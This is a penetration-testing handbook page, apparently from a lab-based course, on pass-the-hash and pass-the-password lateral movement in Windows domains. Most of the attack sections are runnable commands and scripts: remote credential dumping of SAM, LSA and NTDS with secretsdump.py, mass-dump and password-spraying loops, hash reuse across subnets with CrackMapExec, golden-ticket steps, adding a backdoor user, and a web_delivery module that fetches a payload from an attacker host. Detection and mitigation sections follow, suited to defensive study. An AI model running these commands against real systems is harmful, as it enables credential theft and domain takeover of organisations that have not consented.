Pass Attacks (PTH/PTT)

Overview

Pass attacks leverage compromised credentials (passwords or NTLM hashes) for lateral movement in Windows networks. Once you crack a password or dump SAM hashes, you can use these credentials to authenticate to other systems without needing to crack the hash.

What are Pass Attacks?

  • Pass the Password: Using cracked plaintext passwords to authenticate to other systems

  • Pass the Hash: Using NTLM hashes directly for authentication without cracking them

  • Lateral Movement: Moving from one compromised system to others using valid credentials

  • Credential Reuse: Exploiting the fact that users often reuse passwords across systems

secretsdump.py - Credential Extraction Master

Overview

secretsdump.py is part of the Impacket suite and is used to extract credentials from Windows systems. It can dump SAM, LSA secrets, and NTDS.dit files both locally and remotely.

Installation

# Install Impacket
pip3 install impacket

# Or install from source
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .

# Verify installation
secretsdump.py -h

Basic Usage

Remote Credential Dumping

# Basic syntax
secretsdump.py DOMAIN/username:password@target_ip

# Example with domain credentials
secretsdump.py MARVEL.local/fcastle:Password1@10.0.0.25

# Local authentication (non-domain)
secretsdump.py administrator:password@10.0.0.25

# Using NTLM hash instead of password
secretsdump.py -hashes :ntlm_hash DOMAIN/username@target_ip
secretsdump.py -hashes :5fbc3d5fec8206a30f4b6c473d68ae76 MARVEL.local/administrator@10.0.0.25

Local File Analysis

# Analyze local SAM file
secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL

# Analyze NTDS.dit file
secretsdump.py -ntds ntds.dit -system system.hive LOCAL

# With additional hives
secretsdump.py -sam sam.hive -security security.hive -system system.hive -ntds ntds.dit LOCAL

Advanced Options

Output Control

# Save output to file
secretsdump.py DOMAIN/user:pass@target -outputfile credentials

# Just NTLM hashes
secretsdump.py DOMAIN/user:pass@target -just-dc-ntlm

# Just user data (no machine accounts)
secretsdump.py DOMAIN/user:pass@target -just-dc-user

# Include password history
secretsdump.py DOMAIN/user:pass@target -history

# Show password last set date
secretsdump.py DOMAIN/user:pass@target -pwd-last-set

Specific Credential Types

# Only SAM database
secretsdump.py DOMAIN/user:pass@target -sam

# Only LSA secrets
secretsdump.py DOMAIN/user:pass@target -lsa

# Only NTDS (Domain Controller)
secretsdump.py DOMAIN/user:pass@target -ntds

# All credential types
secretsdump.py DOMAIN/user:pass@target -all

Domain Controller Specific

# Extract from specific DC
secretsdump.py DOMAIN/user:pass@dc01.domain.local

# Use different extraction method
secretsdump.py DOMAIN/user:pass@target -use-vss

# Resume interrupted dump
secretsdump.py DOMAIN/user:pass@target -resumefile resume.txt

# Specify target system
secretsdump.py DOMAIN/user:pass@target -target-system dc01.domain.local

Practical Examples

Scenario 1: Workstation Credential Dump

# Compromised workstation with local admin
secretsdump.py administrator:Password123@192.168.1.10

# Expected output:
# [*] Service RemoteRegistry is in stopped state
# [*] Starting service RemoteRegistry
# [*] Target system bootKey: 0x5c1e984781ca0757d8d0827d788bcf1
# [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Scenario 2: Domain Controller NTDS Dump

# Domain admin credentials
secretsdump.py MARVEL.local/administrator:Password1@192.168.1.225

# Output includes all domain accounts:
# [*] Dumping Domain Credentials (domain\username:rid:lmhash:nthash)
# MARVEL.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76:::
# MARVEL.LOCAL\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# MARVEL.LOCAL\fcastle:1001:aad3b435b51404eeaad3b435b51404ee:e6f48c2526bd594441d3da372155f6f:::
# MARVEL.LOCAL\tstark:1002:aad3b435b51404eeaad3b435b51404ee:c88e4ceb4c20c2bd024ce0cf4bd01530:::

Scenario 3: Pass the Hash with secretsdump

# Using previously dumped hash
secretsdump.py -hashes :5fbc3d5fec8206a30f4b6c473d68ae76 administrator@192.168.1.25

# Domain hash usage
secretsdump.py -hashes :e6f48c2526bd594441d3da372155f6f MARVEL.local/fcastle@192.168.1.225

Understanding Output Formats

SAM Hash Format

# Format: username:rid:lmhash:nthash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76:::

# Breakdown:
# - Administrator: Username
# - 500: Relative ID (RID)
# - aad3b435b51404eeaad3b435b51404ee: LM hash (usually empty/disabled)
# - 5fbc3d5fec8206a30f4b6c473d68ae76: NTLM hash (what we use for pass-the-hash)

Domain Credentials Format

# Format: DOMAIN\username:rid:lmhash:nthash
MARVEL.LOCAL\fcastle:1001:aad3b435b51404eeaad3b435b51404ee:e6f48c2526bd594441d3da372155f6f:::

# Machine accounts (end with $)
MARVEL.LOCAL\SPIDERMAN$:1103:aad3b435b51404eeaad3b435b51404ee:hash:::

Cached Credentials

# DCC2 format (domain cached credentials)
MARVEL.LOCAL/tstark:$DCC2$10240#tstark#c88e4ceb4c20c2bd024ce0cf4bd01530

# Format breakdown:
# - $DCC2$: Indicates cached credential type
# - 10240: Iteration count
# - tstark: Username
# - hash: The actual cached hash

Integration with Other Tools

Using Dumped Hashes with CrackMapExec

# After secretsdump, use hashes with CME
secretsdump.py DOMAIN/user:pass@target -outputfile domain_hashes

# Extract NTLM hashes and use with CME
crackmapexec smb 192.168.1.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76

Hash Cracking with Hashcat

# Extract NTLM hashes for cracking
grep -E ":[0-9]+:aad3b435b51404eeaad3b435b51404ee:" secretsdump_output.txt | cut -d: -f4 > ntlm_hashes.txt

# Crack with hashcat
hashcat -m 1000 ntlm_hashes.txt rockyou.txt

# Crack DCC2 hashes
hashcat -m 2100 dcc2_hashes.txt rockyou.txt

Golden Ticket Creation

# Extract krbtgt hash from NTDS dump
grep krbtgt secretsdump_output.txt

# Use with ticketer.py for golden ticket
ticketer.py -nthash krbtgt_hash -domain-sid domain_sid -domain domain.local administrator

Advanced Techniques

VSS (Volume Shadow Service) Method

# Use Volume Shadow Copy for extraction
secretsdump.py DOMAIN/user:pass@target -use-vss

# Benefits:
# - Can extract from locked files
# - Less likely to be detected
# - Works even if services are running

Kerberos Authentication

# Use Kerberos ticket instead of password
export KRB5CCNAME=/tmp/krb5cc_0
secretsdump.py -k -no-pass DOMAIN/user@target.domain.local

# With specific ticket cache
secretsdump.py -k -no-pass -dc-ip dc_ip DOMAIN/user@target

LDAP Integration

# Specify LDAP server
secretsdump.py DOMAIN/user:pass@target -ldap-server ldap://dc.domain.local

# Use LDAPS
secretsdump.py DOMAIN/user:pass@target -ldap-server ldaps://dc.domain.local

Defensive Considerations

Detection Indicators

# Windows Event Logs to monitor:
# - Event ID 4624: Logon (Type 3 - Network)
# - Event ID 4648: Explicit credential logon
# - Event ID 4672: Special privileges assigned
# - Event ID 5140: Network share accessed (ADMIN$, C$)
# - Event ID 4697: Service installed (if using service method)

# Registry access patterns:
# - HKLM\SAM\SAM\Domains\Account\Users
# - HKLM\SECURITY\Policy\Secrets
# - Remote registry access to these keys

Prevention Strategies

# Implement proper access controls:
# - Restrict administrative access
# - Use LAPS for local admin passwords
# - Enable credential guard
# - Implement JEA (Just Enough Administration)
# - Monitor for suspicious registry access
# - Use Protected Users group for sensitive accounts

Troubleshooting Common Issues

Access Denied Errors

# Ensure proper privileges
# For SAM/LSA: Local administrator required
# For NTDS: Domain administrator or backup operator required

# Check if RemoteRegistry service is running
sc query RemoteRegistry

# Start RemoteRegistry if needed
sc start RemoteRegistry

Connection Issues

# Specify target explicitly
secretsdump.py DOMAIN/user:pass@target -target-ip ip_address

# Use different authentication method
secretsdump.py -hashes :hash DOMAIN/user@target

# Check firewall/network connectivity
telnet target 445

Large Domain Optimization

# Resume interrupted dumps
secretsdump.py DOMAIN/user:pass@target -resumefile resume.txt

# Limit output to specific types
secretsdump.py DOMAIN/user:pass@target -just-dc-user

# Use specific output format
secretsdump.py DOMAIN/user:pass@target -outputfile results

Automation Scripts

Bash Script for Multiple Targets

#!/bin/bash
# Mass secretsdump script

DOMAIN="MARVEL.local"
USERNAME="administrator"
PASSWORD="Password1"
TARGETS="targets.txt"

while read -r target; do
    echo "[+] Dumping credentials from $target"
    secretsdump.py "$DOMAIN/$USERNAME:$PASSWORD@$target" -outputfile "${target}_dump"
    sleep 2
done < "$TARGETS"

Python Integration

#!/usr/bin/env python3
import subprocess
import sys
import re

def extract_ntlm_hashes(secretsdump_output):
    """Extract NTLM hashes from secretsdump output"""
    hash_pattern = r'([^:]+):(\d+):([a-f0-9]{32}):([a-f0-9]{32}):::'
    hashes = []
    
    for line in secretsdump_output.split('\n'):
        match = re.search(hash_pattern, line)
        if match:
            username, rid, lm_hash, ntlm_hash = match.groups()
            if ntlm_hash != '31d6cfe0d16ae931b73c59d7e0c089c0':  # Not empty hash
                hashes.append((username, ntlm_hash))
    
    return hashes

def run_secretsdump(target, domain, username, password):
    """Run secretsdump and return output"""
    cmd = f"secretsdump.py {domain}/{username}:{password}@{target}"
    result = subprocess.run(cmd.split(), capture_output=True, text=True)
    return result.stdout

# Usage example
target = "192.168.1.10"
domain = "MARVEL.local"
username = "administrator"
password = "Password1"

output = run_secretsdump(target, domain, username, password)
hashes = extract_ntlm_hashes(output)

for user, hash_val in hashes:
    print(f"{user}:{hash_val}")

Real-World Attack Chain with secretsdump

Phase 1: Initial Access

# 1. Gained access to workstation as local admin
# 2. Dump local SAM for additional credentials
secretsdump.py administrator:LocalPass123@192.168.1.50

# Found: user1:hash1, user2:hash2

Phase 2: Lateral Movement

# 3. Test dumped hashes on other systems
crackmapexec smb 192.168.1.0/24 -u user1 -H hash1

# 4. Found admin access to server
# 5. Dump server credentials
secretsdump.py -hashes :hash1 user1@192.168.1.100

# Found: serviceaccount:servicehash

Phase 3: Domain Compromise

# 6. Test service account across domain
crackmapexec smb 192.168.1.0/24 -u serviceaccount -H servicehash

# 7. Found DC access, dump NTDS
secretsdump.py -hashes :servicehash DOMAIN/serviceaccount@dc.domain.local

# 8. Extract krbtgt hash for golden ticket
grep krbtgt ntds_dump.txt

Pass Attack Mitigations

Overview

While pass attacks are hard to completely prevent, organizations can implement several strategies to make them significantly more difficult for attackers to execute successfully.

Limit Account Re-use

Avoid Re-using Local Admin Passwords

# Problem: Same local admin password across multiple systems
# Solution: Use unique passwords for each system

# Implement LAPS (Local Administrator Password Solution)
# - Automatically generates unique passwords for each computer
# - Stores passwords in Active Directory
# - Regularly rotates passwords
# - Provides secure password retrieval for authorized users

Disable Default Accounts

# Disable Guest account
net user guest /active:no

# Disable built-in Administrator account (if not needed)
net user administrator /active:no

# Create custom administrative accounts instead
net user customadmin Password123! /add
net localgroup administrators customadmin /add

Implement Least Privilege

# Limit who has local administrator rights
# Use principle of least privilege
# Regular audit of administrative group memberships

# PowerShell to audit local admins
Get-LocalGroupMember -Group "Administrators"

# Domain-wide admin audit
Get-ADGroupMember "Domain Admins"
Get-ADGroupMember "Enterprise Admins"

Utilize Strong Passwords

Password Length Requirements

# Implement minimum 14+ character passwords
# The longer the better for hash cracking resistance

# Group Policy settings:
# Computer Configuration > Windows Settings > Security Settings > Account Policies > Password Policy
# - Minimum password length: 14 characters
# - Password must meet complexity requirements: Enabled
# - Maximum password age: 60-90 days

Avoid Common Words

# Banned password list implementation
# Avoid dictionary words, company names, common patterns
# Use passphrases instead of passwords

# Examples of strong passwords:
# - MyC0mp@nyH@sStr0ngP@ssw0rds!2024
# - ILoveEating$Pizza&Burgers123
# - Coffee+Morning=ProductiveDay2024!

Passphrase Implementation

# Encourage long sentences/passphrases
# Easier to remember, harder to crack
# Examples:
# - "I drink 3 cups of coffee every morning!"
# - "My favorite movie is Star Wars Episode 4"
# - "Security training happens every Tuesday at 2PM"

Privilege Access Management (PAM)

Check Out/In Sensitive Accounts

# Implement PAM solutions like:
# - CyberArk
# - BeyondTrust
# - Thycotic Secret Server

# Benefits:
# - Passwords are checked out when needed
# - Automatic password rotation after use
# - Full session recording and monitoring
# - Approval workflows for access

Automatic Password Rotation

# Rotate passwords on check out and check in
# Prevents credential reuse after access
# Limits window of opportunity for attackers

# Implementation example:
# 1. User requests access to server
# 2. PAM generates new password
# 3. User gets temporary access
# 4. Password is rotated again after session ends

Session Monitoring

# Monitor and record privileged sessions
# Alert on suspicious activities
# Maintain audit trails for compliance

# Key monitoring points:
# - Login times and duration
# - Commands executed
# - Files accessed
# - Network connections made

Additional Mitigation Strategies

Network Segmentation

# Segment critical systems
# Limit lateral movement opportunities
# Implement micro-segmentation where possible

# Network design considerations:
# - Separate VLANs for different security zones
# - Firewall rules between segments
# - Jump boxes for administrative access
# - DMZ for internet-facing services

Multi-Factor Authentication (MFA)

# Implement MFA for all administrative accounts
# Use hardware tokens where possible
# Require MFA for remote access

# MFA options:
# - Smart cards
# - FIDO2 security keys
# - Mobile authenticator apps
# - Biometric authentication

Credential Guard and Protected Users

# Enable Windows Credential Guard
# Use Protected Users security group
# Implement LSASS protection

# Protected Users group benefits:
# - Cannot use NTLM authentication
# - Cannot use DES or RC4 in Kerberos
# - Cannot be delegated
# - Cannot use weak cryptography

Regular Security Audits

# Conduct regular password audits
# Test for weak/reused passwords
# Monitor for credential exposure

# Audit activities:
# - Password strength assessments
# - Credential reuse detection
# - Privileged account reviews
# - Access rights validation

Monitoring and Detection

Event Log Monitoring

# Monitor for pass-the-hash indicators
# Key events to watch:

# Event ID 4624 - Successful logon
# - Look for Type 3 (Network) logons
# - Monitor for unusual logon patterns
# - Alert on administrative account usage

# Event ID 4648 - Explicit credential logon
# - Indicates use of alternate credentials
# - Common in pass-the-hash attacks

# Event ID 4672 - Special privileges assigned
# - Administrative privileges granted
# - Monitor for unexpected privilege assignments

Behavioral Analytics

# Implement User and Entity Behavior Analytics (UEBA)
# Detect unusual access patterns
# Alert on anomalous administrative activities

# Behavioral indicators:
# - Unusual login times
# - Access from unexpected locations
# - Rapid lateral movement
# - Excessive privilege usage

Honeypots and Decoys

# Deploy honeypot accounts
# Create fake high-value targets
# Monitor for unauthorized access attempts

# Honeypot strategies:
# - Fake administrative accounts
# - Decoy servers with monitoring
# - Canary tokens in documents
# - Fake service accounts

Implementation Checklist

Immediate Actions

โ–ก Enable LAPS for local administrator passwords
โ–ก Disable unnecessary default accounts
โ–ก Implement strong password policies (14+ characters)
โ–ก Enable MFA for all administrative accounts
โ–ก Audit current administrative group memberships

Short-term Goals (1-3 months)

โ–ก Implement PAM solution for privileged accounts
โ–ก Deploy credential guard on all systems
โ–ก Set up comprehensive event log monitoring
โ–ก Conduct password strength audit
โ–ก Implement network segmentation

Long-term Strategy (3-12 months)

โ–ก Deploy UEBA solution
โ–ก Implement zero-trust network architecture
โ–ก Regular penetration testing focused on pass attacks
โ–ก Staff security awareness training
โ–ก Continuous security monitoring and improvement

Cost-Benefit Analysis

Low-Cost, High-Impact Measures

# Free or low-cost mitigations:
# - Strong password policies
# - Disabling unnecessary accounts
# - Basic event log monitoring
# - Regular administrative account audits
# - Security awareness training

Medium-Cost, High-Impact Measures

# Moderate investment mitigations:
# - LAPS implementation
# - MFA deployment
# - Basic PAM solution
# - Network segmentation
# - Enhanced monitoring tools

High-Cost, High-Impact Measures

# Significant investment mitigations:
# - Enterprise PAM solution
# - UEBA implementation
# - Zero-trust architecture
# - Advanced threat detection
# - Comprehensive security operations center

CrackMapExec (CME) - The Swiss Army Knife

Installation

# Install via pip
pip3 install crackmapexec

# Install from source
git clone https://github.com/Porchetta-Industries/CrackMapExec.git
cd CrackMapExec
python3 setup.py install

# Install via apt (Kali Linux)
sudo apt install crackmapexec

Basic SMB Enumeration

# Basic network scan for SMB
crackmapexec smb 192.168.1.0/24

# Scan specific targets
crackmapexec smb 192.168.1.10-20

# Scan from file
crackmapexec smb targets.txt

# Verbose output
crackmapexec smb 192.168.1.0/24 -v

Authentication Methods

Pass the Password

# Single target with username/password
crackmapexec smb 192.168.1.10 -u administrator -p Password123

# Multiple targets with single credential
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123

# Domain authentication
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1

# Multiple users and passwords
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

# Password spraying (one password, multiple users)
crackmapexec smb 192.168.1.0/24 -u users.txt -p Password123

# Credential stuffing (user:pass combinations)
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce

Pass the Hash

# Using NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# Using hash from secretsdump
crackmapexec smb 192.168.1.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76

# Local hash (SAM dump)
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 --local-auth

Advanced Authentication

Domain Authentication

# Domain user authentication
crackmapexec smb 192.168.1.0/24 -u 'DOMAIN\username' -p password

# Alternative domain syntax
crackmapexec smb 192.168.1.0/24 -u username -p password -d DOMAIN.local

# Domain administrator
crackmapexec smb 192.168.1.0/24 -u 'DOMAIN\Administrator' -p password

Null Sessions and Guest Access

# Null session
crackmapexec smb 192.168.1.0/24 -u '' -p ''

# Guest account
crackmapexec smb 192.168.1.0/24 -u guest -p ''

# Anonymous login
crackmapexec smb 192.168.1.0/24 -u anonymous -p anonymous

Command Execution

Basic Command Execution

# Execute single command
crackmapexec smb 192.168.1.10 -u administrator -p password -x "whoami"

# PowerShell command
crackmapexec smb 192.168.1.10 -u administrator -p password -X "Get-Process"

# Command with domain credentials
crackmapexec smb 192.168.1.10 -u fcastle -d MARVEL.local -p Password1 -x "hostname"

Advanced Command Execution

# Execute command on multiple targets
crackmapexec smb 192.168.1.0/24 -u administrator -p password -x "whoami" --threads 50

# Save output to file
crackmapexec smb 192.168.1.0/24 -u administrator -p password -x "ipconfig" > output.txt

# Execute with hash
crackmapexec smb 192.168.1.10 -u administrator -H hash -x "net user"

# PowerShell with encoded command
crackmapexec smb 192.168.1.10 -u admin -p pass -X "powershell.exe -enc <base64_command>"

Share Enumeration

List Shares

# List all shares
crackmapexec smb 192.168.1.10 -u administrator -p password --shares

# List shares with permissions
crackmapexec smb 192.168.1.0/24 -u user -p pass --shares

# List shares with domain credentials
crackmapexec smb 192.168.1.0/24 -u 'DOMAIN\user' -p pass --shares

Access Shares

# List files in specific share
crackmapexec smb 192.168.1.10 -u admin -p pass --spider C$ --pattern txt

# Spider all shares
crackmapexec smb 192.168.1.10 -u admin -p pass --spider-folder .

# Search for specific files
crackmapexec smb 192.168.1.10 -u admin -p pass --spider C$ --pattern "*.config"

Credential Dumping

SAM Database

# Dump SAM hashes
crackmapexec smb 192.168.1.10 -u administrator -p password --sam

# Dump with hash authentication
crackmapexec smb 192.168.1.10 -u administrator -H hash --sam

# Dump from multiple targets
crackmapexec smb 192.168.1.0/24 -u administrator -p password --sam

LSA Secrets

# Dump LSA secrets
crackmapexec smb 192.168.1.10 -u administrator -p password --lsa

# Dump NTDS (Domain Controller)
crackmapexec smb 192.168.1.10 -u administrator -p password --ntds

# Dump with specific method
crackmapexec smb 192.168.1.10 -u admin -p pass --ntds --ntds-history --ntds-pwdLastSet

Module Usage

Available Modules

# List all modules
crackmapexec smb --list-modules

# Get module info
crackmapexec smb -M module_name --module-info

Common Modules

# Mimikatz module
crackmapexec smb 192.168.1.10 -u admin -p pass -M mimikatz

# Token impersonation
crackmapexec smb 192.168.1.10 -u admin -p pass -M tokens

# Web delivery
crackmapexec smb 192.168.1.10 -u admin -p pass -M web_delivery -o URL=http://attacker/payload

# Empire module
crackmapexec smb 192.168.1.10 -u admin -p pass -M empire_exec -o LISTENER=test

# Persistence
crackmapexec smb 192.168.1.10 -u admin -p pass -M persistence -o METHOD=registry

Practical Attack Scenarios

Scenario 1: Password Spraying

# Create user list
echo -e "administrator\nadmin\nuser\nservice" > users.txt

# Password spray common passwords
crackmapexec smb 192.168.1.0/24 -u users.txt -p Password123 --continue-on-success

# Try multiple common passwords
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --continue-on-success

Scenario 2: Lateral Movement with Cracked Password

# Found password: fcastle:Password1
# Test across network
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1

# Execute commands on accessible systems
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1 -x "whoami"

# Dump credentials from accessible systems
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1 --sam

Scenario 3: Pass the Hash Attack

# Dumped hash: administrator:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
# Use hash for authentication
crackmapexec smb 192.168.1.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76

# Execute commands with hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76 -x "net user hacker Password123 /add"

Other Tools for Pass Attacks

Impacket Suite

# psexec.py - Execute commands
psexec.py DOMAIN/username:password@target_ip

# psexec with hash
psexec.py -hashes :ntlm_hash DOMAIN/username@target_ip

# wmiexec.py - WMI execution
wmiexec.py DOMAIN/username:password@target_ip

# smbexec.py - SMB execution
smbexec.py DOMAIN/username:password@target_ip

# secretsdump.py - Dump credentials
secretsdump.py DOMAIN/username:password@target_ip

Evil-WinRM

# WinRM with password
evil-winrm -i target_ip -u username -p password

# WinRM with hash
evil-winrm -i target_ip -u username -H hash

# WinRM with SSL
evil-winrm -i target_ip -u username -p password -S

Metasploit

# psexec module
use exploit/windows/smb/psexec
set RHOSTS target_ip
set SMBUser username
set SMBPass password
exploit

# Pass the hash module
use exploit/windows/smb/psexec
set RHOSTS target_ip
set SMBUser username
set SMBPass aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
exploit

Defense and Detection

Detection Indicators

# Windows Event Logs to monitor:
# - Event ID 4624: Successful logon (Type 3 - Network)
# - Event ID 4625: Failed logon attempt
# - Event ID 4648: Explicit credential logon
# - Event ID 4672: Special privileges assigned
# - Event ID 5140: Network share accessed

Defensive Measures

# Enable SMB signing
# Disable NTLM authentication where possible
# Implement LAPS for local admin passwords
# Use Protected Users group
# Monitor for lateral movement patterns
# Implement network segmentation

Advanced Techniques

Kerberos Authentication

# Use Kerberos ticket
crackmapexec smb target.domain.local --use-kcache

# Specify ticket cache
crackmapexec smb target.domain.local --use-kcache --kcache /tmp/krb5cc_0

NTLM Relay Integration

# Use with ntlmrelayx
# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -tf targets.txt -c "crackmapexec smb targets.txt -u username -p password --sam"

# Terminal 2: Trigger authentication
# Use various methods to trigger NTLM authentication

Scripting and Automation

Bash Automation

#!/bin/bash
# Mass credential testing script

TARGETS="targets.txt"
USERS="users.txt"
PASSWORDS="passwords.txt"

while read -r target; do
    echo "Testing $target"
    crackmapexec smb "$target" -u "$USERS" -p "$PASSWORDS" --continue-on-success
done < "$TARGETS"

Python Integration

#!/usr/bin/env python3
import subprocess
import sys

def test_credentials(target, username, password):
    cmd = f"crackmapexec smb {target} -u {username} -p {password}"
    result = subprocess.run(cmd.split(), capture_output=True, text=True)
    
    if "Pwn3d!" in result.stdout:
        print(f"[+] Success: {username}:{password} on {target}")
        return True
    return False

# Usage
targets = ["192.168.1.10", "192.168.1.11"]
credentials = [("admin", "password"), ("user", "123456")]

for target in targets:
    for username, password in credentials:
        test_credentials(target, username, password)

Common CME Flags and Options

Authentication Flags

-u, --username          Username
-p, --password          Password
-H, --hash              NTLM hash
-d, --domain            Domain
--local-auth            Local authentication
--continue-on-success   Continue after successful auth

Execution Flags

-x, --exec              Execute command (cmd.exe)
-X, --ps-exec           Execute PowerShell command
--no-output             Don't print command output
--codec                 Set encoding for output

Database and Logging

--verbose               Verbose output
--debug                 Debug output
--log                   Export logs to file
--export                Export credentials to file

Troubleshooting Common Issues

Connection Issues

# SMB signing required
crackmapexec smb target --signing

# Specify SMB version
crackmapexec smb target --smb-version 1

# Timeout issues
crackmapexec smb target --timeout 10

Authentication Issues

# Check if account is locked
crackmapexec smb target -u username -p '' --check-lockout

# Test guest access
crackmapexec smb target -u guest -p ''

# Verify domain name
crackmapexec smb target -u username -p password -d DOMAIN

Real-World Attack Chain Example

Phase 1: Initial Compromise

# 1. Capture NTLM hash via responder/mitm6
# 2. Crack hash or use pass-the-hash
hashcat -m 1000 hash.txt rockyou.txt
# Result: fcastle:Password1

Phase 2: Lateral Movement

# 3. Test credentials across network
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1

# 4. Identify accessible systems
# Results show: SPIDERMAN (Pwn3d!), THEPUNISHER (Pwn3d!)

Phase 3: Credential Harvesting

# 5. Dump SAM from accessible systems
crackmapexec smb 192.168.1.35 -u fcastle -d MARVEL.local -p Password1 --sam
crackmapexec smb 192.168.1.25 -u fcastle -d MARVEL.local -p Password1 --sam

# 6. Extract new credentials
# Found: administrator:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

Phase 4: Privilege Escalation

# 7. Test admin hash across network
crackmapexec smb 192.168.1.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76

# 8. Access domain controller
crackmapexec smb 192.168.1.225 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76 --ntds

Note: Always ensure proper authorization before conducting pass attacks. These techniques should only be used in authorized penetration testing scenarios or controlled lab environments.

PreviousGPP/cPassword AttacksNextDomain Enumeration

Last updated